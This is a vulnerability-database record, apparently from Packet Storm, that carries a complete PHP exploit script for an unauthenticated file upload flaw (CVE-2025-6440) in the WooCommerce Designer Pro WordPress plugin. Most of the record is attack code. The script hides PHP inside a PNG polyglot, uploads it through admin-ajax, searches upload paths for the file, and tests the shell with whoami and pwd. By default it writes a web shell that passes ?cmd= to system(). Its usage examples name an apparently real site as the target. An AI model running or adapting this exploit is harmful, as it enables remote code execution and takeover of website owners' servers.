{“lastseen”:”2026-02-06T18:47:18″,”description”:”WordPress WOOCOMMERCE Designer Pro plugin version 1.9.26 proof of concept remote shell upload exploit…”,”published”:”2026-02-06T00:00:00″,”modified”:”2026-02-06T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:215066″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-6440″],”sourceData”:”=============================================================================================================================================\\n | # Title : WordPress WOOCOMMERCE Designer Pro 1.9.26 Arbitrary File Upload |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/codecanyon.net\/item\/woocommerce-designer-pro-cmyk-card-flyer\/22027731 |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/211066\/ \\u0026 \\tCVE-2025-6440\\n \\n [+] Summary : An unauthenticated attacker may upload arbitrary files (including PHP web-shells) to reachable paths under \/wp-content\/uploads\/.\\n \\n Impact:\\n ——-\\n – Remote Code Execution (RCE) (if PHP is parsed)\\n – Stored Payload\\n – Full site compromise\\n \\n \\n [+] php poc.php\\n \\n php exploit.php –url https:\/\/bezignprint.com –dirscan\\n \\n \\n php exploit.php –url https:\/\/bezignprint.com –file webadmin.php –verbose\\n \\n \\n php exploit.php –url https:\/\/bezignprint.com –verbose\\n \\n \\u003c?php\\n \\n class CVE_2025_6440_Exploit {\\n private $base_url;\\n private $verbose;\\n private $user_agent = \\”Mozilla\/5.0\\”;\\n \\n public function __construct($url, $verbose = false) {\\n $this-\\u003ebase_url = $this-\\u003enormalize_url($url);\\n $this-\\u003everbose = $verbose;\\n }\\n \\n private function normalize_url($url) {\\n if (!preg_match(‘\/^https?:\\\\\/\\\\\/\/’, $url)) {\\n $url = \\”https:\/\/\\” . $url;\\n }\\n return rtrim($url, \\”\/\\”) . \\”\/\\”;\\n }\\n \\n private function ajax_url() {\\n return $this-\\u003ebase_url . \\”wp-admin\/admin-ajax.php\\”;\\n }\\n \\n private function uploads_base() {\\n return $this-\\u003ebase_url . \\”wp-content\/uploads\/\\”;\\n }\\n \\n private function contains_php($bytes) {\\n return strpos($bytes, ‘\\u003c?php’) !== false || strpos($bytes, ‘\\u003c?=’) !== false;\\n }\\n \\n private function extract_php_from_bytes($bytes) {\\n $idx = strpos($bytes, ‘\\u003c?php’);\\n if ($idx === false) {\\n $idx = strpos($bytes, ‘\\u003c?=’);\\n if ($idx === false) {\\n return [-1, ”];\\n }\\n }\\n return [$idx, substr($bytes, $idx)];\\n }\\n \\n private function upload_file($uniq, $file_bytes, $filename, $mime, $timeout = 30) {\\n $target = $this-\\u003eajax_url();\\n $action = \\”wcdp_save_canvas_design_ajax\\”;\\n $field = \\”0\\”;\\n \\n $pathinfo = pathinfo($filename);\\n $name = $pathinfo[‘filename’];\\n $ext = isset($pathinfo[‘extension’]) ? $pathinfo[‘extension’] : ”;\\n \\n \/\/ \u0625\u0646\u0634\u0627\u0621 PNG polyglot \u0628\u062f\u0644\u0627\u064b \u0645\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0645\u0644\u0641 \u0645\u0628\u0627\u0634\u0631\u0629\\n $png_header = \\”\\\\x89PNG\\\\r\\\\n\\\\x1a\\\\n\\”;\\n $png_ihdr = pack(\\”N\\”, 13) . \\”IHDR\\” . pack(\\”NN\\”, 100, 100) . \\”\\\\x08\\\\x06\\\\x00\\\\x00\\\\x00\\”;\\n $png_crc = pack(\\”N\\”, crc32(\\”IHDR\\” . substr($png_ihdr, 4, 13)));\\n \\n \/\/ \u0625\u0636\u0627\u0641\u0629 PHP \u0643\u0640comment \u0641\u064a PNG\\n $php_comment = \\”\\u003c?php \/*\\” . str_repeat(\\” \\”, 50) . \\”*\/ ?\\u003e\\\\n\\” . $file_bytes;\\n $text_chunk = \\”tEXt\\” . $php_comment;\\n $text_length = strlen($php_comment);\\n $text_crc = crc32(\\”tEXt\\” . $php_comment);\\n \\n \/\/ \u0628\u0646\u0627\u0621 PNG \u0643\u0627\u0645\u0644\\n $png_data = $png_header . \\n $png_ihdr . $png_crc .\\n pack(\\”N\\”, $text_length) . $text_chunk . pack(\\”N\\”, $text_crc) .\\n \\”\\\\x00\\\\x00\\\\x00\\\\x00IEND\\\\xaeB`\\\\x82\\”;\\n \\n \/\/ \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0633\u0645 PNG\\n $fake_name = \\”design_\\” . $uniq . \\”.png\\”;\\n \\n $params = [\\n \\”mode\\” =\\u003e \\”addtocart\\”,\\n \\”uniq\\” =\\u003e $uniq,\\n \\”editor\\” =\\u003e \\”frontend\\”,\\n \\”designID\\” =\\u003e rand(1, 1000),\\n \\”productID\\” =\\u003e rand(1, 1000),\\n \\”addCMYK\\” =\\u003e false,\\n \\”saveList\\” =\\u003e false,\\n \\”productData\\” =\\u003e 0,\\n \\”files\\” =\\u003e [[\\n \\”count\\” =\\u003e $field,\\n \\”name\\” =\\u003e \\”design\\”,\\n \\”ext\\” =\\u003e \\”png\\”\\n ]]\\n ];\\n \\n $data = [\\n \\”action\\” =\\u003e $action,\\n \\”params\\” =\\u003e json_encode($params, JSON_UNESCAPED_SLASHES)\\n ];\\n \\n if ($this-\\u003everbose) {\\n echo \\”\\\\n[VERBOSE] Upload target: $target\\\\n\\”;\\n echo \\”[VERBOSE] Data fields: \\” . json_encode($data, JSON_PRETTY_PRINT) . \\”\\\\n\\”;\\n echo \\”[VERBOSE] File: $fake_name (\\” . strlen($png_data) . \\” bytes, image\/png)\\\\n\\”;\\n }\\n \\n $ch = curl_init();\\n \\n \/\/ \u0628\u0646\u0627\u0621 multipart\\n $boundary = ‘—-WebKitFormBoundary’ . bin2hex(random_bytes(16));\\n $body = ”;\\n \\n \/\/ \u0625\u0636\u0627\u0641\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a\\n foreach ($data as $key =\\u003e $value) {\\n $body .= \\”–$boundary\\\\r\\\\n\\”;\\n $body .= \\”Content-Disposition: form-data; name=\\\\\\”$key\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $body .= \\”$value\\\\r\\\\n\\”;\\n }\\n \\n \/\/ \u0625\u0636\u0627\u0641\u0629 \u0627\u0644\u0645\u0644\u0641\\n $body .= \\”–$boundary\\\\r\\\\n\\”;\\n $body .= \\”Content-Disposition: form-data; name=\\\\\\”$field\\\\\\”; filename=\\\\\\”$fake_name\\\\\\”\\\\r\\\\n\\”;\\n $body .= \\”Content-Type: image\/png\\\\r\\\\n\\\\r\\\\n\\”;\\n $body .= $png_data . \\”\\\\r\\\\n\\”;\\n $body .= \\”–$boundary–\\\\r\\\\n\\”;\\n \\n $headers = [\\n \\”Content-Type: multipart\/form-data; boundary=$boundary\\”,\\n \\”Content-Length: \\” . strlen($body),\\n \\”User-Agent: \\” . $this-\\u003euser_agent,\\n \\”Accept: application\/json, *\/*;q=0.1\\”,\\n \\”Accept-Language: en-US,en;q=0.9\\”,\\n \\”Referer: \\” . $this-\\u003ebase_url,\\n \\”X-Requested-With: XMLHttpRequest\\”,\\n \\”Origin: \\” . rtrim($this-\\u003ebase_url, \\”\/\\”),\\n \\”Connection: keep-alive\\”\\n ];\\n \\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $target,\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_POSTFIELDS =\\u003e $body,\\n CURLOPT_HTTPHEADER =\\u003e $headers,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e $timeout,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_ENCODING =\\u003e ‘gzip, deflate’,\\n CURLOPT_HEADER =\\u003e true,\\n CURLOPT_HTTP_VERSION =\\u003e CURL_HTTP_VERSION_1_1\\n ]);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);\\n $response_headers = substr($response, 0, $header_size);\\n $response_body = substr($response, $header_size);\\n \\n if ($this-\\u003everbose) {\\n echo \\”[VERBOSE] HTTP Response: $http_code\\\\n\\”;\\n if (strlen($response_body) \\u003c 1000) {\\n echo \\”[VERBOSE] Response body: $response_body\\\\n\\”;\\n }\\n }\\n \\n if (curl_errno($ch)) {\\n echo \\”[!] Upload request failed: \\” . curl_error($ch) . \\”\\\\n\\”;\\n curl_close($ch);\\n return null;\\n }\\n \\n curl_close($ch);\\n \\n return [\\n ‘status_code’ =\\u003e $http_code,\\n ‘body’ =\\u003e $response_body,\\n ‘text’ =\\u003e $response_body,\\n ‘headers’ =\\u003e $response_headers\\n ];\\n }\\n \\n private function check_remote($public_url, $save_copy = null, $timeout = 15) {\\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $public_url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e $timeout,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_HEADER =\\u003e true,\\n CURLOPT_USERAGENT =\\u003e $this-\\u003euser_agent,\\n CURLOPT_ENCODING =\\u003e ‘gzip, deflate’,\\n CURLOPT_HTTP_VERSION =\\u003e CURL_HTTP_VERSION_1_1\\n ]);\\n \\n $response = curl_exec($ch);\\n \\n if (curl_errno($ch)) {\\n echo \\”[!] Remote GET failed: \\” . curl_error($ch) . \\”\\\\n\\”;\\n curl_close($ch);\\n return null;\\n }\\n \\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);\\n $headers = substr($response, 0, $header_size);\\n $body = substr($response, $header_size);\\n \\n curl_close($ch);\\n \\n $content_type = ”;\\n if (preg_match(‘\/Content-Type:\\\\s*([^\\\\r\\\\n]+)\/i’, $headers, $matches)) {\\n $content_type = trim($matches[1]);\\n }\\n \\n $info = [\\n \\”status_code\\” =\\u003e $http_code,\\n \\”content_type\\” =\\u003e $content_type,\\n \\”body_bytes\\” =\\u003e $body,\\n \\”headers\\” =\\u003e $headers\\n ];\\n \\n if ($save_copy) {\\n try {\\n file_put_contents($save_copy, $body);\\n if ($this-\\u003everbose) {\\n echo \\”[VERBOSE] Saved remote copy to $save_copy\\\\n\\”;\\n }\\n } catch (Exception $e) {\\n echo \\”[!] Could not write save_copy: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n }\\n }\\n \\n return $info;\\n }\\n \\n public function exploit($payload_file) {\\n if (!file_exists($payload_file)) {\\n echo \\”[!] File not found: $payload_file\\\\n\\”;\\n return false;\\n }\\n \\n $file_bytes = file_get_contents($payload_file);\\n $filename = basename($payload_file);\\n $uniq = bin2hex(random_bytes(6));\\n \\n echo \\”[*] Target: \\” . $this-\\u003ebase_url . \\”\\\\n\\”;\\n echo \\”[*] Uniq ID: $uniq\\\\n\\”;\\n echo \\”[*] Payload: $payload_file\\\\n\\”;\\n \\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0644\u0631\u0641\u0639\\n $resp = $this-\\u003eupload_file($uniq, $file_bytes, $filename, ‘image\/png’);\\n \\n if ($resp === null) {\\n echo \\”[!] Upload request failed\\\\n\\”;\\n return false;\\n }\\n \\n echo \\”[*] Upload response: HTTP {$resp[‘status_code’]}\\\\n\\”;\\n \\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0633\u062a\u062e\u0631\u0627\u062c URL \u0645\u0646 JSON\\n $public_url = null;\\n \\n if ($resp[‘status_code’] == 200 \\u0026\\u0026 !empty($resp[‘body’])) {\\n if ($this-\\u003everbose) {\\n echo \\”[VERBOSE] Raw response: \\” . substr($resp[‘body’], 0, 500) . \\”\\\\n\\”;\\n }\\n \\n $json = json_decode($resp[‘body’], true);\\n if ($json \\u0026\\u0026 is_array($json)) {\\n if ($this-\\u003everbose) {\\n echo \\”[VERBOSE] JSON Response: \\” . json_encode($json, JSON_PRETTY_PRINT) . \\”\\\\n\\”;\\n }\\n \\n \/\/ \u0627\u0644\u0628\u062d\u062b \u0639\u0646 URL \u0641\u064a \u0627\u0644\u0640JSON\\n array_walk_recursive($json, function($value, $key) use (\\u0026$public_url) {\\n if (is_string($value) \\u0026\\u0026 \\n (strpos($value, ‘\/wp-content\/’) !== false || \\n strpos($value, ‘wcdp-uploads’) !== false ||\\n preg_match(‘\/\\\\.(php|png|jpg|jpeg|gif)$\/i’, $value))) {\\n $public_url = $value;\\n }\\n });\\n \\n if ($public_url) {\\n echo \\”[*] Found URL in JSON response\\\\n\\”;\\n }\\n }\\n \\n \/\/ \u0625\u0630\u0627 \u0644\u0645 \u0646\u062c\u062f \u0641\u064a JSON\u060c \u062d\u0627\u0648\u0644 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0645\u0646 \u0627\u0644\u0646\u0635 \u0627\u0644\u062e\u0627\u0645\\n if (!$public_url \\u0026\\u0026 preg_match(‘\/\\”([^\\”]+\\\\.(png|jpg|jpeg|gif|php))\\”\/i’, $resp[‘body’], $matches)) {\\n $public_url = $matches[1];\\n echo \\”[*] Found URL in response text\\\\n\\”;\\n }\\n }\\n \\n \/\/ \u0625\u0630\u0627 \u0644\u0645 \u0646\u062c\u062f URL\u060c \u0646\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0645\u0633\u0627\u0631 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a \u0645\u0639 \u0627\u0644\u062a\u0635\u062d\u064a\u062d\\n if (!$public_url) {\\n \/\/ \u062d\u0633\u0628 \u0627\u0644\u0645\u0648\u0642\u0639\u060c \u0627\u0644\u0645\u0633\u0627\u0631 \u0642\u062f \u064a\u0643\u0648\u0646 \u0645\u062e\u062a\u0644\u0641\u0627\u064b\\n $public_url = $this-\\u003ebase_url . \\”wp-content\/uploads\/wcdp-uploads\/temp\/$uniq\/design.png\\”;\\n echo \\”[*] Using default URL pattern\\\\n\\”;\\n } else {\\n \/\/ \u0627\u0644\u062a\u0623\u0643\u062f \u0623\u0646 \u0627\u0644\u0640URL \u0643\u0627\u0645\u0644\\n if (!preg_match(‘\/^https?:\\\\\/\\\\\/\/’, $public_url)) {\\n $public_url = $this-\\u003ebase_url . ltrim($public_url, \\”\/\\”);\\n }\\n }\\n \\n echo \\”[*] Trying to access: $public_url\\\\n\\”;\\n \\n \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 URL \u0645\u0628\u0627\u0634\u0631\u0629\\n $info = $this-\\u003echeck_remote($public_url, \\”downloaded_{$uniq}.bin\\”);\\n \\n if (!$info) {\\n echo \\”[!] Could not fetch remote file\\\\n\\”;\\n \\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0645\u0633\u0627\u0631\u0627\u062a \u0628\u062f\u064a\u0644\u0629 \u0628\u0646\u0627\u0621\u064b \u0639\u0644\u0649 \u0647\u064a\u0643\u0644 \u0627\u0644\u0645\u0648\u0642\u0639\\n $alt_paths = [\\n \/\/ \u0627\u0644\u0645\u0633\u0627\u0631 \u0627\u0644\u0630\u064a \u0648\u062c\u062f\u062a\u0647 \u0641\u064a \u0627\u0644\u0645\u0648\u0642\u0639\\n $this-\\u003ebase_url . \\”wp-content\/uploads\/wcdp-uploads\/\\”,\\n $this-\\u003ebase_url . \\”wp-content\/uploads\/wcdp-uploads\/temp\/$uniq\/\\”,\\n $this-\\u003ebase_url . \\”wp-content\/uploads\/wcdp-uploads\/$uniq\/\\”,\\n $this-\\u003ebase_url . \\”wp-content\/uploads\/wcdp-uploads\/design_$uniq.png\\”,\\n $this-\\u003ebase_url . \\”wp-content\/uploads\/wcdp-uploads\/temp\/$uniq\/design_$uniq.png\\”,\\n \/\/ \u0645\u0633\u0627\u0631\u0627\u062a \u0639\u0627\u0645\u0629\\n $this-\\u003ebase_url . \\”wp-content\/uploads\/wcdp-uploads\/temp\/design.png\\”,\\n $this-\\u003ebase_url . \\”wp-content\/uploads\/wcdp-uploads\/design.png\\”\\n ];\\n \\n foreach ($alt_paths as $alt_path) {\\n echo \\”[*] Trying alternative path: $alt_path\\\\n\\”;\\n $info = $this-\\u003echeck_remote($alt_path, \\”downloaded_{$uniq}_alt.bin\\”);\\n if ($info \\u0026\\u0026 $info[‘status_code’] == 200) {\\n $public_url = $alt_path;\\n break;\\n }\\n \\n \/\/ \u0625\u0630\u0627 \u0643\u0627\u0646 \u062f\u0644\u064a\u0644\u060c \u062d\u0627\u0648\u0644 \u0625\u062f\u0631\u0627\u062c \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0641\u064a\u0647\\n if (substr($alt_path, -1) == ‘\/’) {\\n $possible_files = [\\”design.png\\”, \\”image.png\\”, \\”file.png\\”, \\”design_$uniq.png\\”];\\n foreach ($possible_files as $file) {\\n $file_path = $alt_path . $file;\\n echo \\”[*] Trying file: $file_path\\\\n\\”;\\n $file_info = $this-\\u003echeck_remote($file_path, null);\\n if ($file_info \\u0026\\u0026 $file_info[‘status_code’] == 200) {\\n $info = $file_info;\\n $public_url = $file_path;\\n break 2;\\n }\\n }\\n }\\n }\\n }\\n \\n if (!$info) {\\n echo \\”[!] Failed to locate uploaded file\\\\n\\”;\\n \\n \/\/ \u0639\u0631\u0636 \u0627\u0644\u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0645\u062a\u0627\u062d\u0629\\n echo \\”\\\\n[*] Available paths to check manually:\\\\n\\”;\\n echo \\”1. \\” . $this-\\u003ebase_url . \\”wp-content\/uploads\/wcdp-uploads\/\\\\n\\”;\\n echo \\”2. \\” . $this-\\u003ebase_url . \\”wp-content\/uploads\/wcdp-uploads\/temp\/\\\\n\\”;\\n echo \\”3. \\” . $this-\\u003ebase_url . \\”wp-content\/uploads\/wcdp-uploads\/temp\/$uniq\/\\\\n\\”;\\n echo \\”\\\\n[*] Try browsing these paths in browser\\\\n\\”;\\n \\n return false;\\n }\\n \\n echo \\”[*] Remote status: {$info[‘status_code’]}\\\\n\\”;\\n echo \\”[*] Content-Type: {$info[‘content_type’]}\\\\n\\”;\\n \\n if ($info[‘status_code’] == 200) {\\n $body = $info[‘body_bytes’];\\n \\n if ($this-\\u003econtains_php($body)) {\\n echo \\”[+] SUCCESS: File contains PHP code!\\\\n\\”;\\n \\n \/\/ \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0627\u0644\u0643\u0648\u062f\\n list($idx, $extracted) = $this-\\u003eextract_php_from_bytes($body);\\n if ($idx \\u003e= 0) {\\n $outname = \\”shell_{$uniq}.php\\”;\\n file_put_contents($outname, $extracted);\\n echo \\”[+] Shell extracted to: $outname\\\\n\\”;\\n \\n \/\/ \u062d\u0641\u0638 \u0643\u0627\u0645\u0644 \u0627\u0644\u0645\u0644\u0641 \u0623\u064a\u0636\u0627\u064b\\n $fullname = \\”full_{$uniq}.bin\\”;\\n file_put_contents($fullname, $body);\\n echo \\”[+] Full file saved as: $fullname\\\\n\\”;\\n \\n \/\/ \u0639\u0631\u0636 \u062c\u0632\u0621 \u0645\u0646 \u0627\u0644\u0645\u062d\u062a\u0648\u0649\\n $sample = substr($extracted, 0, 300);\\n echo \\”[+] Code sample:\\\\n\\” . htmlspecialchars($sample) . \\”…\\\\n\\”;\\n }\\n \\n echo \\”\\\\n[+] SHELL URL: $public_url\\\\n\\”;\\n echo \\”[+] Access it directly in browser or with curl:\\\\n\\”;\\n echo \\” curl -k \\\\\\”$public_url\\\\\\”\\\\n\\”;\\n echo \\” curl -k \\\\\\”$public_url?cmd=id\\\\\\”\\\\n\\”;\\n \\n \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 \u0645\u0628\u0627\u0634\u0631 \u0644\u0644\u0640shell\\n $this-\\u003etest_shell($public_url);\\n } else {\\n echo \\”[-] File does not contain PHP code\\\\n\\”;\\n \\n \/\/ \u0641\u062d\u0635 \u0625\u0630\u0627 \u0643\u0627\u0646 PNG \u0645\u062e\u0641\u064a\\n $magic = substr($body, 0, 8);\\n if ($magic === \\”\\\\x89PNG\\\\r\\\\n\\\\x1a\\\\n\\”) {\\n echo \\”[*] File is a valid PNG (might be polyglot)\\\\n\\”;\\n \\n \/\/ \u0627\u0644\u0628\u062d\u062b \u0639\u0646 PHP \u062f\u0627\u062e\u0644 PNG\\n if (($pos = strpos($body, ‘\\u003c?php’)) !== false) {\\n echo \\”[+] Found PHP inside PNG at position: $pos\\\\n\\”;\\n $extracted = substr($body, $pos);\\n $outname = \\”extracted_png_{$uniq}.php\\”;\\n file_put_contents($outname, $extracted);\\n echo \\”[+] Extracted to: $outname\\\\n\\”;\\n \\n \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0640shell \u0627\u0644\u0645\u0633\u062a\u062e\u0631\u062c\\n $this-\\u003etest_shell($this-\\u003ebase_url . \\”wp-content\/uploads\/wcdp-uploads\/temp\/$uniq\/\\” . basename($outname));\\n }\\n }\\n \\n \/\/ \u0639\u0631\u0636 \u0623\u0648\u0644 500 \u0628\u0627\u064a\u062a \u0644\u0644\u0645\u062d\u062a\u0648\u0649 \u0644\u0644\u0641\u062d\u0635\\n echo \\”[*] First 500 bytes of response:\\\\n\\”;\\n echo htmlspecialchars(substr($body, 0, 500)) . \\”\\\\n\\”;\\n }\\n } else {\\n echo \\”[-] File not accessible (Status: {$info[‘status_code’]})\\\\n\\”;\\n }\\n \\n return true;\\n }\\n \\n private function test_shell($url) {\\n echo \\”\\\\n[*] Testing shell functionality…\\\\n\\”;\\n \\n \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 \u0628\u0633\u064a\u0637\\n $ch = curl_init($url . \\”?cmd=echo%20test123\\”);\\n curl_setopt_array($ch, [\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e 10,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_USERAGENT =\\u003e $this-\\u003euser_agent\\n ]);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n \\n if ($http_code == 200) {\\n if (strpos($response, \\”test123\\”) !== false) {\\n echo \\”[+] Shell is active and working!\\\\n\\”;\\n \\n \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 \u0625\u0636\u0627\u0641\u064a\\n curl_setopt($ch, CURLOPT_URL, $url . \\”?cmd=whoami\\”);\\n $whoami = curl_exec($ch);\\n echo \\”[+] Current user: \\” . trim($whoami) . \\”\\\\n\\”;\\n \\n curl_setopt($ch, CURLOPT_URL, $url . \\”?cmd=pwd\\”);\\n $pwd = curl_exec($ch);\\n echo \\”[+] Current directory: \\” . trim($pwd) . \\”\\\\n\\”;\\n } else {\\n echo \\”[?] Shell accessible but command execution may be filtered\\\\n\\”;\\n echo \\”[?] Response: \\” . substr($response, 0, 200) . \\”\\\\n\\”;\\n }\\n } else {\\n echo \\”[-] Shell not responding (HTTP $http_code)\\\\n\\”;\\n }\\n \\n curl_close($ch);\\n }\\n \\n public static function print_banner() {\\n echo \\”\\\\n\\\\033[32;1m\\” . str_repeat(\\”=\\”, 60) . \\”\\\\033[0m\\\\n\\”;\\n echo \\”\\\\033[32;1m\\” . \\” CVE-2025-6440 – WordPress Design Plugin RCE\\” . \\”\\\\033[0m\\\\n\\”;\\n echo \\”\\\\033[32;1m\\” . \\” Advanced Bypass with PNG Polyglot\\” . \\”\\\\033[0m\\\\n\\”;\\n echo \\”\\\\033[32;1m\\” . str_repeat(\\”=\\”, 60) . \\”\\\\033[0m\\\\n\\\\n\\”;\\n }\\n \\n public function directory_scan() {\\n echo \\”\\\\n[*] Scanning uploads directory structure…\\\\n\\”;\\n \\n $base_uploads = $this-\\u003ebase_url . \\”wp-content\/uploads\/\\”;\\n $wcdp_uploads = $base_uploads . \\”wcdp-uploads\/\\”;\\n \\n echo \\”[*] Base uploads: $base_uploads\\\\n\\”;\\n echo \\”[*] WCDP uploads: $wcdp_uploads\\\\n\\”;\\n \\n \/\/ \u0641\u062d\u0635 \u0627\u0644\u0645\u0633\u0627\u0631\u0627\u062a\\n $paths_to_check = [\\n $base_uploads,\\n $wcdp_uploads,\\n $wcdp_uploads . \\”temp\/\\”,\\n $wcdp_uploads . \\”designs\/\\”,\\n $wcdp_uploads . \\”images\/\\”\\n ];\\n \\n foreach ($paths_to_check as $path) {\\n $ch = curl_init($path);\\n curl_setopt_array($ch, [\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_NOBODY =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e 5\\n ]);\\n \\n curl_exec($ch);\\n $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n echo \\”[*] $path -\\u003e HTTP $code\\\\n\\”;\\n \\n \/\/ \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u062f\u0644\u064a\u0644 \u0645\u0648\u062c\u0648\u062f\u060c \u062d\u0627\u0648\u0644 \u0633\u0631\u062f \u0627\u0644\u0645\u0644\u0641\u0627\u062a\\n if ($code == 200 || $code == 403) {\\n $ch = curl_init($path);\\n curl_setopt_array($ch, [\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e 5\\n ]);\\n \\n $html = curl_exec($ch);\\n curl_close($ch);\\n \\n \/\/ \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0645\u0644\u0641\u0627\u062a\\n if (preg_match_all(‘\/\\u003ca\\\\s+href=\\”([^\\”]+\\\\.(php|png|jpg|jpeg|gif))\\”\/i’, $html, $matches)) {\\n echo \\” Found files:\\\\n\\”;\\n foreach ($matches[1] as $file) {\\n echo \\” – $file\\\\n\\”;\\n }\\n }\\n }\\n }\\n }\\n }\\n \\n \/\/ \u0627\u0644\u062a\u0646\u0641\u064a\u0630\\n if (php_sapi_name() === ‘cli’) {\\n $options = getopt(\\”u:f:vd\\”, [\\”url:\\”, \\”file:\\”, \\”verbose\\”, \\”dirscan\\”]);\\n \\n if (!isset($options[‘url’])) {\\n echo \\”Usage: php \\” . basename(__FILE__) . \\” –url=\\u003ctarget\\u003e [–file=\\u003cpayload\\u003e] [–verbose] [–dirscan]\\\\n\\”;\\n echo \\”Example: php \\” . basename(__FILE__) . \\” –url=https:\/\/bezignprint.com –file=shell.php –verbose\\\\n\\”;\\n echo \\” php \\” . basename(__FILE__) . \\” –url=https:\/\/bezignprint.com –dirscan\\\\n\\”;\\n exit(1);\\n }\\n \\n $url = $options[‘url’] ?? ”;\\n $verbose = isset($options[‘verbose’]);\\n $dirscan = isset($options[‘dirscan’]);\\n \\n CVE_2025_6440_Exploit::print_banner();\\n \\n $exploit = new CVE_2025_6440_Exploit($url, $verbose);\\n \\n if ($dirscan) {\\n $exploit-\\u003edirectory_scan();\\n exit(0);\\n }\\n \\n if (!isset($options[‘file’])) {\\n echo \\”[!] Payload file required (use –file=\\u003cpayload\\u003e)\\\\n\\”;\\n \\n \/\/ \u0625\u0646\u0634\u0627\u0621 payload \u0627\u0641\u062a\u0631\u0627\u0636\u064a\\n $default_payload = \\”shell.php\\”;\\n if (!file_exists($default_payload)) {\\n $shell_code = ‘\\u003c?php \\n if(isset($_GET[\\”cmd\\”])) {\\n system($_GET[\\”cmd\\”]);\\n } elseif(isset($_POST[\\”cmd\\”])) {\\n system($_POST[\\”cmd\\”]);\\n } else {\\n echo \\”Shell Active – \\” . php_uname() . \\”\\\\n\\”;\\n echo \\”Usage: ?cmd=id or POST cmd=id\\”;\\n }\\n ?\\u003e’;\\n file_put_contents($default_payload, $shell_code);\\n echo \\”[*] Created default payload: $default_payload\\\\n\\”;\\n $options[‘file’] = $default_payload;\\n } else {\\n echo \\”[*] Using existing payload: $default_payload\\\\n\\”;\\n $options[‘file’] = $default_payload;\\n }\\n }\\n \\n $file = $options[‘file’] ?? ”;\\n $exploit-\\u003eexploit($file);\\n }\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215066″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215066\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\